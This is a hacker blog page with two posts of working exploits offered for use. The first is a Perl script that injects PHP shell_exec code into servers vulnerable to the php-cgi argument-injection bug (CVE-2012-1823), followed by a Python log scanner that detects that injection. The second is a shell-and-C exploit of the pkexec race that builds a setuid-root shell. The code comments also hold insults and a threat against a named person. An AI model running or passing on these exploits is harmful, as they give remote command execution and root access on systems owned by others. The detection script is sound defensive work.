[Exploit]: PHP CGI exec-cmd/injection of PHP code through PHP tags by (xd) PERL CODE

Posted on 6th May 2012 in Codes, Exploits, Papers, Uncategorized

Done this, but this is only a basic version which, I guess, does things in a nice way :)

It is my 3rd Perl exploit, so please don't bash me; any fixes etc. would be appreciated, BUT remember it is using the RIGHT method, i.e. injecting PHP by shell_exec(), which IS a PHP CGI function, and the ONLY way it will definitely exec!

OK, now on with the show....


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code through PHP tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!!!
use strict;
use warnings;
use IO::Socket::INET;

if (@ARGV < 2) {
    print "Usage:\n";
    print "$0 <Host> <Cmd [Ex: id]>\n";
    exit(-1);
}

my ($host, $cmd) = @ARGV;

# PHP code injected through php tags: shell_exec() runs the command and
# the echoed output comes back in the HTTP response body.
my $payload = "<?php echo shell_exec('$cmd'); ?>";

# php-cgi (CVE-2012-1823) treats a query string with no '=' in it as its
# own command-line options (split on '+', then URL-decoded).  -d
# allow_url_include=On is what lets auto_prepend_file name the php://input
# stream, so the POST body (our payload) runs before the requested script.
# The path must be the URL at which php-cgi is reached on the target.
my $path = "/cgi-bin/?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input";

sub Connect {
    print "[+] Connecting ..\n";
    my $sock = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $host,
        PeerPort => 80,
    ) or die "[-] Connect Error ..\n";
    return $sock;
}

my $sock = Connect();
print "[+] Executing command payload thru php-shellexec: ( $cmd ) ..\n";

# HTTP header lines end in CRLF; Content-Length tells php-cgi how much of
# php://input there is to read.
print $sock "POST $path HTTP/1.1\r\n"
    . "Host: $host\r\n"
    . "Accept: */*\r\n"
    . "Content-Type: application/x-www-form-urlencoded\r\n"
    . "Content-Length: " . length($payload) . "\r\n"
    . "Connection: close\r\n"
    . "\r\n"
    . $payload;

print "[+] Sent evilcode, running: ( $cmd ) ..\n";
while (my $answer = <$sock>) {
    print "[*] Server reply: $answer";
}
close($sock);

 

Enjoy / xd–
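The defender's side of the same bug, added here as an example and not part of xd's post: a Python script that redoes the query-string handling php-cgi applied (a query string with no literal '=' is split on '+', URL-decoded piece by piece and handed to the program as argv, which php-cgi then parsed as its own options) and flags access-log requests whose resulting argv starts with a php-cgi switch. The combined log format, the list of switches watched and the sample log lines are assumptions I made for the example, not data from the page.

```python
"""Spot php-cgi argument injection (CVE-2012-1823 style) in web-server access logs."""
import re
from urllib.parse import unquote

# php-cgi command-line options that matter when they reach argv: -d sets any
# ini directive (allow_url_include, auto_prepend_file, ...), -s dumps the
# script source, -n/-c swap php.ini.  Assumption: these are the switches worth
# alerting on, not an exhaustive list of php-cgi options.
DANGEROUS_OPTS = ("-d", "-s", "-n", "-c")

# Request field of a combined-format log line: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<path>[^ ?"]*)(?:\?(?P<query>[^ "]*))? HTTP/')


def cgi_argv(query_string):
    """Reproduce how a CGI program sees an 'indexed' query string.

    Per the CGI spec a query string containing no literal '=' is split on
    '+', URL-decoded piece by piece and passed to the program as argv.  An
    '=' that only appears encoded (%3D) does not count, which is exactly why
    the exploit encodes it.
    """
    if "=" in query_string:
        return []
    return [unquote(part) for part in query_string.split("+") if part]


def is_php_cgi_injection(query_string):
    """True if the query string would put a php-cgi switch on argv."""
    return any(arg.startswith(DANGEROUS_OPTS) for arg in cgi_argv(query_string))


def scan_log(lines):
    """Return (path, raw query) for every request line carrying an injection."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and m.group("query") and is_php_cgi_injection(m.group("query")):
            hits.append((m.group("path"), m.group("query")))
    return hits


# Constructed sample lines (not real traffic).  The first carries the same
# option string as the Perl exploit above, the second is the source-disclosure
# variant with the dash URL-encoded; the last two are benign and must not fire.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/May/2012:12:00:01 +0000] "POST /cgi-bin/php?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input HTTP/1.1" 200 57 "-" "perl"',
    '203.0.113.5 - - [06/May/2012:12:00:02 +0000] "GET /index.php?%2ds HTTP/1.1" 200 1023 "-" "curl"',
    '198.51.100.7 - - [06/May/2012:12:00:03 +0000] "GET /index.php?page=home&id=-d HTTP/1.1" 200 4096 "-" "Mozilla"',
    '198.51.100.7 - - [06/May/2012:12:00:04 +0000] "GET /search?php+cgi HTTP/1.1" 200 4096 "-" "Mozilla"',
]

if __name__ == "__main__":
    for path, query in scan_log(SAMPLE_LOG):
        print("php-cgi injection:", path, "?", query)
```

The test is deliberately done on the raw, undecoded query string first and only then on the decoded pieces: that mirrors the order php-cgi worked in, and it is the same test a rewrite rule placed in front of php-cgi has to make (no '=' in the raw query string, and a decoded first piece that starts with '-'). A query like `?-derp` on a legitimate site will trip it; that is a false positive worth accepting on a host that still runs php-cgi this way.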

PolicyKit Pwnage PROPER root exploit based on zx2c4 code, very nice working version made by Admin

Posted on 10th November 2011 in Codes, Exploits

Enjoy, but I advise to simply use the C binary if you have it compiled, or just modify this a little to suit your needs. This works on Ubuntu 10.04.4 (latest stable anyhow) on a 3.0.4 kernel. It is NOT 0day at all, but with so many fakes around I guess I decided to close this one. Next I will do is bzip2, or rather, I have DONE it, but I might hang on to it, as, if you look into that src, it goes VERYYYYY far (almost every distro affected!!).
Anyhow, this is polkit.sh:

#!/bin/sh
## policykit-pwnage.c -> to -> bash version -> polkit.sh by xd-- / #HaxNET@EFNet
## The pkexec race (CVE-2011-1485, zx2c4's technique): the parent process
## replaces itself with a setuid-root binary (chsh) at the moment polkit
## reads /proc/<pid> for the child's pkexec, so polkit sees uid 0 and
## authorises the command pkexec was asked to run.
cd /media/ || exit 1
cat > su.c << EOF
#include <unistd.h>
#include <stdio.h>

/* Setuid-root wrapper: once pkexec has chown'd and chmod'd it for us it
 * drops the caller into a root shell.  A constructor with no main does not
 * link, so the work is done in main. */
int main(void) {
    char *a[] = {"/bin/sh", NULL};
    setuid(0);
    setgid(0);
    execve(a[0], a, NULL);
    perror("execve");
    return 1;
}
EOF
cat > makesu.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <limits.h>
#include <sys/types.h>
#include <sys/inotify.h>

/* Usage: ./makesu <command> [args...]   (runs the command through pkexec) */
int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <command> [args...]\n", argv[0]);
        return 1;
    }
    if (fork() != 0) {
        /* Parent: wait until polkit touches /proc/<our pid> on behalf of the
         * child's pkexec, then become a setuid-root process (chsh) so that
         * the uid polkit reads there is 0. */
        int fd;
        char pid_path[64];
        char buf[sizeof(struct inotify_event) + NAME_MAX + 1];
        sprintf(pid_path, "/proc/%i", getpid());
        close(0);
        close(1);
        close(2);
        fd = inotify_init();
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        read(fd, buf, sizeof(buf));   /* blocks until the first access */
        execl("/usr/bin/chsh", "chsh", NULL);
    } else {
        /* Child: give the parent time to arm its watch, then ask pkexec to
         * run the requested command (argv[1..]) as root. */
        sleep(2);
        argv[0] = "pkexec";
        execv("/usr/bin/pkexec", argv);
    }
    return 0;
}
_EOF
gcc -o su su.c
gcc -o makesu makesu.c
./makesu chown root:root su
./makesu chmod u+s su
# the pkexec children run detached from makesu; give them time to finish
sleep 5
echo "-> Your suid shell is on /media/su make sure ya move this!"
/media/su

That's all for now.. I doubt I'll publish the bzip :P ~~
laterz.
xd–